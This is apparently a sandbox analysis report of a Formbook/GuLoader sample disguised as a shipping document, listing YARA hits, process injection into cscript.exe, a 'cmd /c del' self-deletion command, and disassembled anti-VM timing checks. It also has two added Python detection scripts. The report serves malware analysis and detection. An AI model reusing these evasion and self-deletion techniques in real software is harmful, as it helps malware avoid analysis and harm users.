    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@7/0@3/3
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_01
    Source: AWB_&_Shipping Doc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: AWB_&_Shipping Doc.exe | Virustotal: Detection: 11%
    Source: unknown | Process created: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: unknown | Process created: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: unknown | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
    Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Process created: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: Binary string: cscript.pdbUGP | source: AWB_&_Shipping Doc.exe, 00000001.00000003.295618720.0000000000A75000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP | source: AWB_&_Shipping Doc.exe, 00000001.00000002.303381103.000000001E23F000.00000040.00000001.sdmp, cscript.exe, 0000000B.00000003.298334067.00000000044F0000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb | source: AWB_&_Shipping Doc.exe, cscript.exe
    Source: Binary string: cscript.pdb | source: AWB_&_Shipping Doc.exe, 00000001.00000003.295618720.0000000000A75000.00000004.00000001.sdmp
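    The native-API inventory for cscript.exe above (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread, NtQueueApcThread) and the process tree (the sample re-launching itself, the injected cscript.exe, and cscript.exe running cmd.exe /c del against the dropper) are the evidence behind the hollowing and self-deletion verdicts. The following is an added example, not part of this report and not the sandbox's own detection logic: it parses rows in the report's "Source: ... Code function: ..." and "Source: ... Process created: ..." shape and applies those two heuristics. The API sets used as the hollowing and APC-injection chains are assumptions, and the sample rows are a constructed subset of the lines above.

```python
import re

# Constructed sample: a subset of the report's own rows, in the
# "Source: <process> Code function: <id> <apis>,<id>" and
# "Source: <process> Process created: <image> <command line>" shapes.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\cscript.exe Code function: 11_2_046F99D0 NtCreateProcessEx,11_2_046F99D0",
    r"Source: C:\Windows\SysWOW64\cscript.exe Code function: 11_2_046F97A0 NtUnmapViewOfSection,11_2_046F97A0",
    r"Source: C:\Windows\SysWOW64\cscript.exe Code function: 11_2_046F98A0 NtWriteVirtualMemory,11_2_046F98A0",
    r"Source: C:\Windows\SysWOW64\cscript.exe Code function: 11_2_046FAD30 NtSetContextThread,11_2_046FAD30",
    r"Source: C:\Windows\SysWOW64\cscript.exe Code function: 11_2_046F9A20 NtResumeThread,11_2_046F9A20",
    r"Source: C:\Windows\SysWOW64\cscript.exe Code function: 11_2_046F9950 NtQueueApcThread,11_2_046F9950",
    r"Source: C:\Windows\SysWOW64\cscript.exe Code function: 11_2_046F9540 NtReadFile,LdrInitializeThunk,11_2_046F9540",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1898A0 NtWriteVirtualMemory,1_2_1E1898A0",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E189950 NtQueueApcThread,1_2_1E189950",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Process created: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'",
    r"Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'",
]

# Row shapes as they appear in the report; the function id repeats at the end.
CODE_RE = re.compile(
    r"^Source: (?P<proc>.+?) Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]+) (?P<apis>.+),(?P=fid)$"
)
PROC_RE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: (?P<child>.+?\.exe)(?: (?P<cmd>.*))?$"
)
DEL_RE = re.compile(r"/c\s+del\s+'?(?P<target>[^']+)'?", re.IGNORECASE)

# Assumed heuristic: the native-API set that together implements process
# hollowing (create a suspended process, unmap its image, write a new one,
# repoint the main thread, resume it), and the APC-injection pair.
HOLLOWING_CHAIN = {
    "NtCreateProcessEx", "NtUnmapViewOfSection", "NtWriteVirtualMemory",
    "NtSetContextThread", "NtResumeThread",
}
APC_INJECTION = {"NtWriteVirtualMemory", "NtQueueApcThread"}


def parse_report(lines):
    """Return ({process: set of native APIs}, [(parent, child, cmdline), ...])."""
    apis_by_proc = {}
    processes = []
    for line in lines:
        m = CODE_RE.match(line.strip())
        if m:
            apis = {a.strip() for a in m.group("apis").split(",")}
            apis_by_proc.setdefault(m.group("proc"), set()).update(apis)
            continue
        m = PROC_RE.match(line.strip())
        if m:
            processes.append((m.group("parent"), m.group("child"), m.group("cmd") or ""))
    return apis_by_proc, processes


def find_injection(apis_by_proc):
    """Map each process to the injection techniques its native-API usage covers."""
    findings = {}
    for proc, apis in apis_by_proc.items():
        techniques = []
        if HOLLOWING_CHAIN <= apis:
            techniques.append("process hollowing")
        if APC_INJECTION <= apis:
            techniques.append("APC injection")
        if techniques:
            findings[proc] = techniques
    return findings


def find_self_delete(processes):
    """Flag cmd.exe children spawned to delete a file: [(parent, deleted_path)]."""
    hits = []
    for parent, child, cmd in processes:
        if child.lower().endswith("\\cmd.exe"):
            m = DEL_RE.search(cmd)
            if m:
                hits.append((parent, m.group("target").strip()))
    return hits


def triage(lines):
    """Run both heuristics over report rows and return the findings."""
    apis_by_proc, processes = parse_report(lines)
    return {
        "injection": find_injection(apis_by_proc),
        "self_delete": find_self_delete(processes),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

    Run against the constructed rows, only cscript.exe carries the full hollowing chain; the dropper itself shows the APC pair only, which matches its role here (it hands off to the hollowed cscript.exe rather than hollowing anything itself), and the self-delete is attributed to cscript.exe as the parent of the cmd.exe child.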

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match | File source: Process Memory Space: AWB_&_Shipping Doc.exe PID: 6204, type: MEMORY
    Yara detected VB6 Downloader Generic
    Source: Yara match | File source: Process Memory Space: AWB_&_Shipping Doc.exe PID: 6204, type: MEMORY
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_0040461D push edx; iretd 0_2_004045ED
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_00405E1F pushfd; retf 0_2_00405F94
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_00403691 push B35EBC04h; ret 0_2_00403696
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_004064AF pushad; ret 0_2_004064CA
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_00405740 pushad; iretd 0_2_0040573E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_0040575D pushad; iretd 0_2_0040573E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_00403B05 push 2B54F807h; ret 0_2_00403B0A
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_0040570A pushad; iretd 0_2_0040573E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_0040630F pushfd; retf 0_2_00406320
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_004067CE push edx; ret 0_2_004067D6
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_004045E4 push edx; iretd 0_2_004045ED
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 0_2_00405FA7 pushfd; retf 0_2_00405F94
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E19D0D1 push ecx; ret 1_2_1E19D0E4
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0470D0D1 push ecx; ret 11_2_0470D0E4
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00410854 push FFFFFFFDh; iretd 11_2_00410856
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041D0D2 push eax; ret 11_2_0041D0D8
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041D0DB push eax; ret 11_2_0041D142
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041D085 push eax; ret 11_2_0041D0D8
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041E109 push ss; retf 11_2_0041E113
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041D13C push eax; ret 11_2_0041D142
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041E186 push dword ptr [B2588A5Eh]; ret 11_2_0041E1A6
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0040E2C3 push ecx; retf 11_2_0040E2C6
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00408286 push ds; retf 11_2_0040828A
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041DABE push esi; ret 11_2_0041DACE
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_00416B0F push edx; ret 11_2_00416B1E
    Source: C:\Windows\SysWOW64\cscript.exe | Code function: 11_2_0041A796 push eax; retf 11_2_0041A79C

    Hooking and other Techniques for Hiding and Protection:

    Modifies the prolog of user mode functions (user mode inline hooks)
    Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Detected RDTSC dummy instruction sequence (likely for instruction hammering)
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | RDTSC instruction interceptor: First address: 00000000006340DA second address: 00000000006340DA instructions:
        0x00000000 rdtsc
        0x00000002 mov eax, 00000001h
        0x00000007 cpuid
        0x00000009 popad
        0x0000000a call 00007F6200A526C8h
        0x0000000f lfence
        0x00000012 mov edx, dword ptr [7FFE0014h]
        0x00000018 lfence
        0x0000001b ret
        0x0000001c sub edx, esi
        0x0000001e ret
        0x0000001f cmp dl, cl
        0x00000021 pop ecx
        0x00000022 test edi, 83F80AC1h
        0x00000028 add edi, edx
        0x0000002a test ch, bh
        0x0000002c dec ecx
        0x0000002d cmp ecx, 00000000h
        0x00000030 jne 00007F6200A526A6h
        0x00000032 cmp dh, FFFFFFAEh
        0x00000035 push ecx
        0x00000036 call 00007F6200A526E6h
        0x0000003b call 00007F6200A526DAh
        0x00000040 lfence
        0x00000043 mov edx, dword ptr [7FFE0014h]
        0x00000049 lfence
        0x0000004c ret
        0x0000004d mov esi, edx
        0x0000004f pushad
        0x00000050 rdtsc
    Tries to detect Any.run
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | File opened: C:\Program Files\qga\qga.exe
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | File opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: AWB_&_Shipping Doc.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | RDTSC instruction interceptor: First address: 00000000006340DA second address: 00000000006340DA instructions:
        0x00000000 rdtsc
        0x00000002 mov eax, 00000001h
        0x00000007 cpuid
        0x00000009 popad
        0x0000000a call 00007F6200A526C8h
        0x0000000f lfence
        0x00000012 mov edx, dword ptr [7FFE0014h]
        0x00000018 lfence
        0x0000001b ret
        0x0000001c sub edx, esi
        0x0000001e ret
        0x0000001f cmp dl, cl
        0x00000021 pop ecx
        0x00000022 test edi, 83F80AC1h
        0x00000028 add edi, edx
        0x0000002a test ch, bh
        0x0000002c dec ecx
        0x0000002d cmp ecx, 00000000h
        0x00000030 jne 00007F6200A526A6h
        0x00000032 cmp dh, FFFFFFAEh
        0x00000035 push ecx
        0x00000036 call 00007F6200A526E6h
        0x0000003b call 00007F6200A526DAh
        0x00000040 lfence
        0x00000043 mov edx, dword ptr [7FFE0014h]
        0x00000049 lfence
        0x0000004c ret
        0x0000004d mov esi, edx
        0x0000004f pushad
        0x00000050 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | RDTSC instruction interceptor: First address: 00000000006340FC second address: 00000000006340FC instructions:
        0x00000000 rdtsc
        0x00000002 lfence
        0x00000005 shl edx, 20h
        0x00000008 or edx, eax
        0x0000000a ret
        0x0000000b mov esi, edx
        0x0000000d pushad
        0x0000000e mov eax, 00000001h
        0x00000013 cpuid
        0x00000015 bt ecx, 1Fh
        0x00000019 jc 00007F6200A4A560h
        0x0000001f popad
        0x00000020 call 00007F6200A4A1B5h
        0x00000025 lfence
        0x00000028 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | RDTSC instruction interceptor: First address: 00000000005640FC second address: 00000000005640FC instructions:
        0x00000000 rdtsc
        0x00000002 lfence
        0x00000005 shl edx, 20h
        0x00000008 or edx, eax
        0x0000000a ret
        0x0000000b mov esi, edx
        0x0000000d pushad
        0x0000000e mov eax, 00000001h
        0x00000013 cpuid
        0x00000015 bt ecx, 1Fh
        0x00000019 jc 00007F6200A52AD0h
        0x0000001f popad
        0x00000020 call 00007F6200A52725h
        0x00000025 lfence
        0x00000028 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions:
        0x00000000 rdtsc
        0x00000002 xor ecx, ecx
        0x00000004 add ecx, eax
        0x00000006 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions:
        0x00000000 rdtsc
        0x00000002 xor ecx, ecx
        0x00000004 add ecx, eax
        0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions:
        0x00000000 rdtsc
        0x00000002 xor ecx, ecx
        0x00000004 add ecx, eax
        0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions:
        0x00000000 rdtsc
        0x00000002 xor ecx, ecx
        0x00000004 add ecx, eax
        0x00000006 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | Code function: 1_2_1E186DE6 rdtsc, 1_2_1E186DE6
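    The interceptor traces above show two distinct checks in one stub: a pair of rdtsc reads bracketing cpuid (the serialising instruction whose cost balloons under a hypervisor), and in the 6340FC/5640FC traces the sequence mov eax, 1; cpuid; bt ecx, 1Fh, which tests CPUID leaf 1 ECX bit 31, the hypervisor-present bit. The longer trace also loads dword ptr [7FFE0014h], the SystemTime field of KUSER_SHARED_DATA, to compare the cycle delta against wall-clock time. The push imm32; ret, pushfd; retf and pushad; iretd sequences listed under Data Obfuscation are the matching static marker. The following is an added example, not part of the report and not Joe Sandbox or GuLoader code: a byte-pattern scanner that finds both the timing stub and the push/ret patterns in a raw code blob. The sample byte strings are constructed by hand-encoding the 6340FC trace's instructions (relative call and jump targets are arbitrary, lengths match the trace offsets), and the byte windows used to pair the reads are assumed heuristics.

```python
import re

# IA-32 encodings of the instructions the interceptor traces show.
RDTSC = b"\x0f\x31"
CPUID = b"\x0f\xa2"
LFENCE = b"\x0f\xae\xe8"

# Constructed sample: the 6340FC trace above, hand-encoded byte for byte.
# rel32 targets are arbitrary; instruction lengths match the trace offsets.
SAMPLE_TIMING_STUB = (
    RDTSC + LFENCE
    + b"\xc1\xe2\x20"                # shl edx, 20h
    + b"\x09\xc2"                    # or edx, eax
    + b"\xc3"                        # ret
    + b"\x89\xd6"                    # mov esi, edx
    + b"\x60"                        # pushad
    + b"\xb8\x01\x00\x00\x00"        # mov eax, 1
    + CPUID                          # cpuid (leaf 1)
    + b"\x0f\xba\xe1\x1f"            # bt ecx, 1Fh: CPUID.1:ECX[31], hypervisor present
    + b"\x0f\x82\x41\x03\x00\x00"    # jc rel32
    + b"\x61"                        # popad
    + b"\xe8\x90\xfd\xff\xff"        # call rel32
    + LFENCE + RDTSC
)

# Constructed sample of the "push ...; ret" control-flow tricks listed under
# Data Obfuscation, padded with nops.
SAMPLE_OBFUSCATION = (
    b"\x68\x04\xbc\x5e\xb3\xc3"      # push B35EBC04h; ret
    + b"\x90\x90"
    + b"\x9c\xcb"                    # pushfd; retf
    + b"\x90"
    + b"\x60\xcf"                    # pushad; iretd
)

# Assumed window: how far apart the two rdtsc reads of one timing probe may be.
TIMING_WINDOW = 128

# mov eax, 1 ... cpuid ... bt ecx, 1Fh, allowing short gaps between them.
HV_BIT_CHECK = re.compile(
    rb"\xb8\x01\x00\x00\x00.{0,8}?\x0f\xa2.{0,8}?\x0f\xba\xe1\x1f", re.DOTALL
)
OBFUSCATION_PATTERNS = {
    "push imm32; ret": re.compile(rb"\x68....\xc3", re.DOTALL),
    "pushfd; retf": re.compile(rb"\x9c\xcb"),
    "pushad; iretd": re.compile(rb"\x60\xcf"),
}


def find_timing_stubs(code, window=TIMING_WINDOW):
    """Offsets of an rdtsc followed by cpuid and a second rdtsc within `window` bytes."""
    hits = []
    pos = 0
    while True:
        i = code.find(RDTSC, pos)
        if i < 0:
            return hits
        region = code[i + 2:i + window]
        c = region.find(CPUID)
        if c >= 0 and region.find(RDTSC, c + 2) >= 0:
            hits.append(i)
        pos = i + 2


def find_hypervisor_bit_checks(code):
    """Offsets of CPUID leaf-1 queries whose ECX bit 31 (hypervisor present) is tested."""
    return [m.start() for m in HV_BIT_CHECK.finditer(code)]


def find_obfuscation(code):
    """Offsets of each push/ret style control-flow pattern, keyed by pattern name."""
    return {name: [m.start() for m in pat.finditer(code)]
            for name, pat in OBFUSCATION_PATTERNS.items()}


def scan(code):
    """Combine the three scanners into one report for a raw code blob."""
    return {
        "timing_stubs": find_timing_stubs(code),
        "hypervisor_bit_checks": find_hypervisor_bit_checks(code),
        "obfuscation": find_obfuscation(code),
    }


if __name__ == "__main__":
    print(scan(SAMPLE_TIMING_STUB))
    print(scan(SAMPLE_OBFUSCATION))
```

    On the constructed stub the timing probe is reported at offset 0 and the hypervisor-bit check at offset 0x0e, the same offset the trace shows for mov eax, 00000001h. The pattern scanner is deliberately loose: the stub's own lfence and the two-byte rdtsc encoding are what make the pairing reliable, and a per-pattern hit list rather than a boolean lets an analyst cross-check offsets against the interceptor output above.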
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe | API coverage: 8.6 %
    Source: C:\Windows\SysWOW64\cscript.exe | API coverage: 8.6 %
    Source: C:\Windows\explorer.exe TID: 6600 | Thread sleep time: -56000s >= -30000s
    Source: C:\Windows\SysWOW64\cscript.exe TID: 4308 | Thread sleep time: -36000s >= -30000s
    Source: C:\Windows\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\cscript.exe | Last function: Thread delayed
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
    Source: AWB_&_Shipping Doc.exe, 00000001.00000003.250109532.0000000000A6E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
    Source: explorer.exe, 00000003.00000002.481943204.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
    Source: AWB_&_Shipping Doc.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297452586.0000000000A28000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWH2
    Source: explorer.exe, 00000003.00000002.481943204.0000000005603000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
    Source: explorer.exe, 00000003.00000000.264895195.0000000004E61000.00000004.00000001.sdmp | Binary or memory string: Prod_VMware_SATA^
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
    Source: explorer.exe, 00000003.00000000.273945065.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicvss
    Source: explorer.exe, 00000003.00000000.266167405.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
    Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
    Source: explorer.exe, 00000003.00000000.274465279.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
    Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess information queried: ProcessInformationJump to behavior
